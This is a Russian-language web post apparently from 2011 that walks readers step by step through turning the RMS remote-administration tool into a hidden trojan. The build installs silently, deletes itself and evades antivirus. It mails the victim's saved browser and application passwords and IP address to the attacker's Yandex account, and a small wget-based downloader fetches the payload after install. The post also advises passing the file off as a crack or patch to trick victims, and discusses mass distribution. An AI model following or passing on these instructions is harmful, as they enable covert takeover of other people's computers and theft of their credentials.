Главная » Файлы » Это интересно! |
Скрытый RMS [удаленное администрирование]
25.07.2011, 10:19 | |
Всем доброго времени суток! Сегодня мы с вами будем делать скрытую сборку Remote Manipulator System (аналог Radmin) Сразу предупреждаю, что собрать довольно сложно, особенно новичкам, но потраченные усилия точно стоят того. Сборка проверена многими, работает отлично, антивирусами не палится. Я постараюсь объяснять все пошагово и доступным языком. RMS (как и Radmin, TeamViewer etc.) выполняет одну и ту же функцию – удаленное администрирование компьютером Что же умеет RMS? Тут перечислены все его функции, жирным выделено то, чем отличается от Radmina: -Управление и наблюдение -Файловый менеджер -Текстовый чат -Диспетчер задач -Подключение посредством Internet-ID! (так же как у TeamViewer) -Диспетчер устройств -Подключение к командной строке -Запись экрана по расписанию -Простое текстовое сообщение -Поддержка нескольких мониторов -Удаленная установка -Wake-On-Lan -Удаленный реестр. -Функция «Выполнить» -Подключение к web-камере. -Самоудаление -Интеграция с фаерволлом Как видим, преимуществ достаточно, чтобы хотя бы попробовать её в деле Начну с перечисления того, что собой представляет сборка: 1. Полностью скрытая установка (экран не моргает в отличии от Радмина) 2. После запуска установщик самоудаляется. 3. Все файлы сборки скрыты/системны, жертве будет сложнее что-то заметить 4. Все сохраненные пароли компьютера отправляются к Вам на почту (а именно от Mozilla/Opera/IE/Chrome и много много чего другого, впредь до клиента от PokerStars). Мы будем использовать программу Multi Password Recovery v.1.2.5 (новая v.1.2.6 сильно палится). 5. Вам на почту дополнительно отправляется IP, но он нам не понадобится скорее всего, так как мы будем использовать Internet-ID(для обхода NAT - неизвестно что там у "жертвы") 6. Вес будет ~2,8мб, но я обычно создаю даунлоадер ~500кб (скачивает Вашу сборку с сервера, устанавливает, и самоудаляется) 7. Не палится никакими антивирусами (раньше ругался на него Касперский, теперь удалили из баз. Также Антивирусы могут кричать на Multi Pass Recovery, я использовал версию 1.2.5, отличий от 1.2.6 почти нет, но палится гораздо меньше) Итак, начнем собирать, желаю Вам удачи! I. Настройка RMS сервера Первым делом, скачиваем архив (Скачать с Народ.Ru) Открываем папку R, запускаем файл server.exe, устанавливаем (внимание!, в процессе установки галочка Integrate RMS with system Firewall должна стоять!), по завершении установки, программа запустится сама: Перед нами появляется окошко Безопасности: Нажимаем Сменить/Установить – вводим пароль, допустим 12345678rms Переходим во вкладку Аутентификация, стоять должна галочка – Уровень 3 Далее, нажимаем ОК! Все, окошко исчезает. Следующим шагом для нас будет настройка сервера (если у Вас сервер сам не запустился, не появилась синяя иконка в трее, то открываем Пуск, Программы, Remote Manipulator System – Server, Start R-Server) В правом нижнем углу кликаем правой кнопкой по синему значку - Настройка Internet-ID соединения.. Нажимаем Получить новый ID, появляется что-то похожее: ВАЖНО! Скопируйте этот код куда-нибудь, в блокнот! -это адрес к вашей «жертве». Закрываем окошко. Далее «Остановить RMS-сервер» Следующим шагом для нас будет вторая часть настройки сервера: открываем Пуск, Программы, Remote Manipulator System – Server, Settings for R-Server Тут будет два шага, первый мы уже прошли («безопасность»). 2. Режим Запуска – Автоматический 3. Настройки, убрать все галочки, поставить только на "запретить закрытие RMS", также во вкладке Логирование галочка должна быть снята. 4. Лицензионный ключ – введите этот: RMS-F-16D69D1349bF4c9e6526b2Aa7c80Fe17biY2S2dYXlRfDwwnI2 3iqOGL4oXhioPMc+Kd4YjjsuC3bmImXAYNXEYOV0I3KG8dVEUO DllVDmt9ZAQIBAwdWVUObiknDAoEHQIBHAJifGJtCQMKBgELBG txfFZMDwxRXkUOYnF8UVZFDg4fWlUrEjpcXl4O Либо можете получить свой бесплатно на сайте (http://rmansys.ru) далее Окей и закрываем окошко. 5. Закрываем Настройки Открываем директорию, куда установился сервер, и выделяем следующие файлы: Копируем, создаем где-нибудь папку, туда все вставляем. Именно в этой папке у нас будет происходить все самое интересное, далее я эту папку буду называть "Новая Папка” ;) Продолжаем работать. Теперь нам надо экспортировать наши настройки с паролями и всеми настройками. Для этого нам нужно сделать следующее: Для ХР, пуск-выполнить-regedit.exe, и Ок Для 7, просто в строке «найти программы и файлы» вводим regedit.exe, и Ок Мы сейчас открыли редактор реестра. Идем сюда: HKEY_LOCAL_MACHINE/SYSTEM/ далее правой кнопкой по Remote Manipulator System-Экспортировать: И указываем путь нашу созданную папку, (имя файлу задайте - set) в которую мы копировали наши файлы сервера, вот что у Вас должно получиться: Сам по себе файл set.reg – это файл настроек, там хранятся все Ваши настройки, если Вы хотите что-то изменить, Вам нужно заменять только этот файл, проделав все предыдущие шаги. II. Добавляем Multi Password Recovery и остальные нужны нам файлы. В скаченном Вами архиве открываем папку M. В ней ничего менять ненужно, просто все выделяем и копируем в нашу Новую Папку. В итоге должно получится следующее: III. Редактирование установщика Ну вот, перешли к главной части. Выделяем install.bat, правой кнопкой - изменить (первая половина кода служит для того, чтоб на компе жертвы удалить ранее установленный Радмин, Rem_Cam, и если стоял ранее то и RMS, нам ведь не надо чтоб кто-то тоже имел доступ к компьютеру кроме нас). Тут два простых шага: 1. Создаем почту на Яндексе(!): 2. Пожалуйста, здесь не тупите, чтоб не было потом вопросов! Находим это почти в самом конце и редактируем вот это под себя: ###LOGIN### - это ТОЛЬКО логин, БЕЗ добавления @yandex.ru, ###PASSWORD### - 12345678, тут ясно -указываем свои данные с регистрации в Яндексе. Закрываем, сохраняем. Если у вас не установлен архиватор 7zip(!), самое время устанавить, он нам нужен для того чтобы правильно архивировать все в один файл, который будет самоудалятся. Установили из папки 7z. Выделяем в Новой Папке файл setup.exe, правой кнопкой 7-zip-открыть архив. Выделяем все что есть в Новой Папке (кроме setup.exe разумеется) и перетягиваем в то открывшееся окошко. Успешно добавили файлы в архив. В итоге у Вас должно выйти вот это: Копируем куда-нибудь наш файл setup.exe. Все остальное можете удалить из папки. IV. Завершение Итак, открываем папку R, устанавливаем файл Viewer.exe, через него мы будем подключаться к «жертве» по Internet-ID. Подробнее об I-ID и программе, читайте в Справке программы либо на оф. сайте. Там точно найдете ответ на волнующий вопрос. Подключаться можете как по ip (он приходит на почту, так и по Интернет-Ид, если «жертва» за Натом) Предварительно скопируйте папку MultiPass куда-нибудь в Program Files. Для чего? На почту Вам будет приходить файл *.mpf, в нем хранятся все пароли «жертвы». Для расшифровки запускаем программу mpr.exe из MultiPass. Файл – загрузить из файла, и указываем на файл «жертвы». Далее все ясно. Важно! Если Вы собираетесь свою сборку кидать нескольким «жертвам» и сразу, то с Интернет-ИД будут проблемы, так как он присваивается одной сборке для одного компьютера. Если Вы собираетесь распространять свой троян массово, то в таком случае нужно к каждой «жертве» по IP подключатся. Как я лично советую использовать данную сборку. Вы кидаете её какой-нибудь одной жертве, она его устанавливает. Далее Вы можете по тому Internet-ID (который вы выше копировали) подключаться. Сделали всё что Вам нужно на компьютере жертвы и дальше удаляете сборку с компьютера жертвы Для этого нужно: Подключаетесь к жертве и выбираете подключение «Запуск программ»-Обзор - у жертвы заходите в директорию windows\system32 там находите файл de.exe, выбираете.(поставьте галочку «скрытый запуск») Файл de.exe входит в состав сборки. Это самоудаляющийся файл, который полностью удаляет с компа «жертвы» вашу сборку. После запуска этого файла у жертвы лучше проверить удалилась ли сборка (для этого просто пытаемся подключиться снова), если не можем, это означает сборка успешно удалилась и мы можем использовать нашу сборку на другой жертве точно также как и на первой. Это делается для того чтобы не было конфликтов между двумя компьютерами с одним Internet-ID. Большим преимуществом данной сборки будет то что подключение будет стопроцентным! Даже если жертва имеет непрямой IP (за NAT'ом). Также данная сборка интегрируется с фаерволом. В настройках можно включить экономию трафика, в этом случае все работать будет пошустрее и меньше трафика ест. Еще не меньше порадовало наличие встроенного сканера серверов RMS. Если вы вдруг потеряли свою жертву с динамическим IP, Вы можете её легко найти, просканировав диапазон IP в котором она находится (например 92.72.0.0-92.72.255.255) В общем – пробуйте, пишите отзывы. ;) по желанию Создание даунлоадера! Что из себя, собственно, представляет данный даунлоадер и для чего он нужен? Это .exe файл (в нашем случае с размером ~500кб, гораздо меньше чем сама сборка), который сразу после запуска самоудаляется, при этом дроппает в другую папку(windows) один файл, который, ждет подключения к интернету (если его небыло), после появления подключения скачивает Ваш файл и устанавливает, после запуска самоудаляется, не оставив при этом никаких следов (после запуска наша сборка тоже, есессна, самоудаляется) Итак, начнем! Все что нужно, находится в папке Downloader Итак, нам нужна регистрация сервера на Яндексе. У Вас уже должна быть почта на Яндексе, куда приходят IP и .mpf файлы. С этого аккаунта мы зарегистрируем наш сервер, куда будем заливать нашу сборку. Для этого: 1. Зайдите на свой аккаунт на Яндексе 2. Переходим по ссылке http://narod.yandex.ru/ 3. Нажимаем «Создать сайт» (сайт нам не нужен, только файл-менеджер) 4. Выбираем Tabula Rasa (с чистого листа). Что дальше выбирать неважно, просто далее, далее, далее. 5. Когда наш сайт создан заходим в файл-менеджер, ****.narod2.yandex.ru/filemanager/ 6. Выбираем «Загрузить файл», загружем нашу RMS сборку 7. После того как загрузится файл, там должна быть такая серенькая кнопочка «ссылка», нажимаем, копируем. Допустим, у нас уже есть сервер на Яндексе, на котором лежит наш файл. Отлично, идем дальше. Далее распаковываем наш скаченный архив, открываем папку link, файл winupd.bat – изменить. ###LINK### - адрес на файл (тот который Вы скопировали выше) ###DOWNLOADED'FILENAME### - название файла, который лежит на сервере Далее закрываем, сохраняем. Открываем Converter.exe из архива Batch file: открываем наш батник - winupd.bat Save us: оставляем как есть Остальное ставим как на картинке, должно получится вот так: Вкладка Options: Во вкладке Include добавляем файл wget.exe (он лежит в папке link) Вкладка Include: Далее нажимаем Compile Если все правильно сделали у Вас в папке link появится файл winupd.exe, в нем хранится наша ссылка на файл, он как-раз выполняет всю работу. Следующим шагом для нас будет помещение файла winupd.exe в «оболочку», которая его будет дроппать и после этого самоудалятся. Для Вас я её тоже подготовил, Вам нужно только поместить её туда (так же как и с RMS), для этого кликаем правой кнопкой по файлу load.exe, 7-Zip - открыть архив, далее все тоже самое что и с RMS: перетягиваем файл winupd.exe в файлload.exe Всё! Наш даунлоадер готов! (можете переименовать его как хотите) Для «непалевности» и удобства, можно впарить кому-то наш файл под видом кряка, патча, картинки и пр. (сразу говорю, невозможно создать установщик с расширением .jpg, .mp3, разве что перед этим покопавшись в реестре жертвы, ну это бред, лучше использовать СИ. Я, например, впаривал этот троян таким способом: -НЕ СКАЧИВАЙ ЭТОТ ФАЙЛ И НЕ ЗАПУСКАЙ ЕГО!!! причем работало мощно ;)) Если Вам это нужно, идем дальше: Если Вы хотите, чтоб при открытии этого файла открывалась другая прога, картинка или еще что-то: 1. Добавьте в даунлоадер любой файл, например картинку 2. Выделите файл reg.bat, нажмите F4 (должен открыться редактор), затем перепешите эти две строчки (вместо picture_1.jpg, впишите имя своего файла который добавили): Все! Готово! В этом случае при запуске даунлоадера, он сделает все тоже самое, только перед этим запустит Вашу прогу, картинку и пр. ВНИМАНИЕ! Добавил "Экспресс-сборку"! Я решил, что её пока-что смогут опробовать не все. А остальное все по-прежднему.. Изменения в Express v.3: - Упрощена настройка (логин и пароль вводите в текстовике) - После перезагрузки повторно отправляет IP - Теперь фактически можно "штамповать" сборки с разными ID, заменяя только 1 файл (я проверял удалённую смену Internet-ID, работает очень коряво, даже на оф. сайте пишут что пока не могут исправить данную проблему, с удалённым реестром возится тоже не будете, поэтому лучшим вариантом будет как сейчас - каждая сборка со своим уникальным ID) - В установщике теперь всего 6 файлов: - Установка проходит гораздо быстрее - Отшлифовал идеально! Исправил кое какие мелочи, добавил иконку Ключ на v.3: - ВСЕ ПАРОЛИ НА САЙТЕ http://forum.xakepok.net/showthread.php?t=15079 Прошу не обращаться в личку с просьбой дать ключ на котором ограничения! Если Вы благополучно собрали сборку и она пошла Вам на пользу, скажите СПАСИБО! НЕ проверяйте её на VirusTotal.com! Только на novirusthanks.org | |
Просмотров: 34684 | Загрузок: | Комментарии: 150 | Рейтинг: 4.3/15 |
Всего комментариев: 150 | 1 2 3 ... 8 9 » |
| |
1-10 11-20 21-30 ... 71-80 81-84 | |